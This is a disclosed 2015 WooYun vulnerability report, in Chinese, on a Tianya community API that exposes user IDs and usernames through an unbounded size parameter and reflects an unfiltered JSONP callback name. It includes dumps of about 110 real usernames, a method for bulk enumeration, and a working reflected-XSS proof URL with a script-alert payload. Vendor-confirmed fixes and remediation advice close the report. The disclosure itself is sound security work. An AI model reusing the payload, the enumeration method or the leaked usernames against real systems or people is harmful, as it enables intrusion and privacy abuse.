

缺陷编号:wooyun-2015-0127457

漏洞标题:天涯社区某API接口泄露上万用户名+XSS

相关厂商:天涯社区

漏洞作者: 0x 80

提交时间:2015-07-20 11:08

修复时间:2015-09-04 09:58

公开时间:2015-09-04 09:58

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认





漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-21: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向核心白帽子及相关领域专家公开
2015-08-10: 细节向普通白帽子公开
2015-08-20: 细节向实习白帽子公开
2015-09-04: 细节向公众公开

简要描述:

天涯社区某API接口泄露上万用户名+XSS

详细说明:

http://passport.tianya.cn/topapi/newActiveUsers.do?size=54&var=

357.png


var = {"code":"1","success":1,"message":"","data":[{"userId":103955430,"userName":"jianxrs"},{"userId":103955429,"userName":"u_103955429"},{"userId":103955428,"userName":"u_103955428"},{"userId":103955427,"userName":"思愆滔"},{"userId":103955426,"userName":"jingxrajiq"},{"userId":103955425,"userName":"鲜嫩矮小"},{"userId":103955424,"userName":"heymans4"},{"userId":103955423,"userName":"螺水市梦"},{"userId":103955422,"userName":"u_103955422"},{"userId":103955421,"userName":"u_103955421"},{"userId":103955420,"userName":"概钻可以"},{"userId":103955419,"userName":"liaktij"},{"userId":103955418,"userName":"叶翠莲"},{"userId":103955417,"userName":"三门听"},{"userId":103955416,"userName":"盐文辞思"},{"userId":103955415,"userName":"cangvbrphw"},{"userId":103955414,"userName":"娇美祸"},{"userId":103955413,"userName":"景火敏"},{"userId":103955412,"userName":"gegfpa"},{"userId":103955411,"userName":"风雨行路人丶"},{"userId":103955410,"userName":"飞雪无痕2015"},{"userId":103955409,"userName":"拥有思维"},{"userId":103955408,"userName":"零落脑另范"},{"userId":103955407,"userName":"肢类南北"},{"userId":103955406,"userName":"法规和家人"},{"userId":103955405,"userName":"shuanuob"},{"userId":103955404,"userName":"u_103955404"},{"userId":103955403,"userName":"gudanfengzhan"},{"userId":103955402,"userName":"u_103955402"},{"userId":103955401,"userName":"u_103955401"},{"userId":103955400,"userName":"讽白翠只"},{"userId":103955399,"userName":"绪思齐依"},{"userId":103955398,"userName":"u_103955398"},{"userId":103955397,"userName":"fengdajo"},{"userId":103955396,"userName":"u_103955396"},{"userId":103955395,"userName":"u_103955395"},{"userId":103955394,"userName":"岳若蕾"},{"userId":103955393,"userName":"僻静歼"},{"userId":103955392,"userName":"u_103955392"},{"userId":103955391,"userName":"kaorkixbd"},{"userId":103955390,"userName":"u_103955390"},{"userId":103955389,"userName":"quzhiqiumiao"},{"userId":103955388,"userName":"niaoktbr"},{"userId":103955387,"userName":"单薄通红"},{"userId":103955386,"userName":"chuangbaq"},{"userId":103955385,"userName":"12332100052052
0"},{"userId":103955384,"userName":"888999asd"},{"userId":103955383,"userName":"惊吓准化他"},{"userId":103955382,"userName":"傲血2015"},{"userId":103955381,"userName":"纵拐朝夕"},{"userId":103955380,"userName":"u_103955380"},{"userId":103955379,"userName":"孤单俩"},{"userId":103955378,"userName":"u_103955378"},{"userId":103955377,"userName":"qiongrvwelf"}]}


其中 size 参数未做服务端上限校验(原文所称"未加密"实际是指取值未被限制):改变 size 即可让接口一次返回不同数量、不同范围的用户记录(上例 size=54 与 size=55 返回的 userId 区间不同且连续递增),反复请求即可批量枚举用户 ID 与用户名,这也是标题中"上万用户名"的来源。
http://passport.tianya.cn/topapi/newActiveUsers.do?size=55&var=

546.png


var = {"code":"1","success":1,"message":"","data":[{"userId":103955605,"userName":"趋思绎文"},{"userId":103955604,"userName":"fumoshuangchu"},{"userId":103955603,"userName":"流流西"},{"userId":103955602,"userName":"u_103955602"},{"userId":103955601,"userName":"第二十七年夏至"},{"userId":103955600,"userName":"bapzkn"},{"userId":103955599,"userName":"哀怨铲晨酱"},{"userId":103955598,"userName":"fenobmaab"},{"userId":103955597,"userName":"guiklprs"},{"userId":103955596,"userName":"纤手丽人总汇"},{"userId":103955595,"userName":"jianlhvg"},{"userId":103955594,"userName":"pangrraft"},{"userId":103955593,"userName":"u_103955593"},{"userId":103955592,"userName":"一颗小橙子子子"},{"userId":103955591,"userName":"贝敌屈党"},{"userId":103955590,"userName":"静谧思维"},{"userId":103955589,"userName":"唐以波"},{"userId":103955588,"userName":"花雅巧"},{"userId":103955587,"userName":"siyuanshisang"},{"userId":103955586,"userName":"huodatruw"},{"userId":103955585,"userName":"触水深担"},{"userId":103955584,"userName":"领逝木铎金声"},{"userId":103955583,"userName":"jiangnmwwa"},{"userId":103955582,"userName":"搜索附"},{"userId":103955581,"userName":"宁静剖忌隶"},{"userId":103955580,"userName":"daojoab"},{"userId":103955579,"userName":"u_103955579"},{"userId":103955578,"userName":"雀内拢毁"},{"userId":103955577,"userName":"彼此扁平"},{"userId":103955576,"userName":"分生木偶"},{"userId":103955575,"userName":"灵魂独舞2015"},{"userId":103955574,"userName":"danweiluoqiao"},{"userId":103955573,"userName":"qiawypaw"},{"userId":103955572,"userName":"仙赋寻"},{"userId":103955571,"userName":"可以将"},{"userId":103955570,"userName":"果果的天蓝蓝"},{"userId":103955569,"userName":"u_103955569"},{"userId":103955568,"userName":"u_103955568"},{"userId":103955567,"userName":"weigjxbd"},{"userId":103955566,"userName":"u_103955566"},{"userId":103955565,"userName":"u_103955565"},{"userId":103955564,"userName":"尼西贝贝"},{"userId":103955563,"userName":"hansmqgcr"},{"userId":103955562,"userName":"单音役"},{"userId":103955561,"userName":"ninglianjingb"},{"userId":103955560,"userName":"诿唤站幌"},{"userId":10
3955559,"userName":"u_103955559"},{"userId":103955558,"userName":"zhiavvq"},{"userId":103955557,"userName":"左右羞花"},{"userId":103955556,"userName":"tongqaavm"},{"userId":103955555,"userName":"u_103955555"},{"userId":103955554,"userName":"xinggujm"},{"userId":103955553,"userName":"dfg546tfgb"},{"userId":103955552,"userName":"尊秆思齐"},{"userId":103955551,"userName":"siyulingzhi


其中 var 参数(JSONP 回调名)未经任何过滤即原样拼接进响应体开头(响应形如 `var = {...}`),传入 `<script>` 标签即可构成反射型 XSS。注:报告未给出该接口响应的 Content-Type;若为 text/html 则浏览器直接执行,若为 application/javascript 则主要风险为回调名可控导致的脚本注入/JSONP 劫持,需按实际响应头确认。

237.png


http://passport.tianya.cn/topapi/newActiveUsers.do?size=55&var=%3Cscript%3Ealert%28/xss/%29%3C/script%3E

漏洞证明:

http://passport.tianya.cn/topapi/newActiveUsers.do?size=54&var=


修复方案:

(报告原文未给出修复建议,以下为审阅补充)1. 对 size 做服务端类型与上限校验,超限直接拒绝而非截断;2. 对 var(回调名)按标识符字符集白名单校验(如仅允许字母、数字、下划线、$),而不是仅过滤 `<` `>`——单纯黑名单过滤无法覆盖其他注入形式;3. 响应显式设置 Content-Type: application/javascript 并附加 X-Content-Type-Options: nosniff,避免被当作 HTML 解析;4. 对该接口增加频率限制与访问日志,降低批量枚举用户名的速度。

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-07-21 09:57

厂商回复:

天涯的用户名本身就是公开的,因此不存在泄露之说,但依然感谢漏洞发布者的提醒,我们已经调整了相关接口,限制了size大小,并对“< >”符号进行了过滤

最新状态:

暂无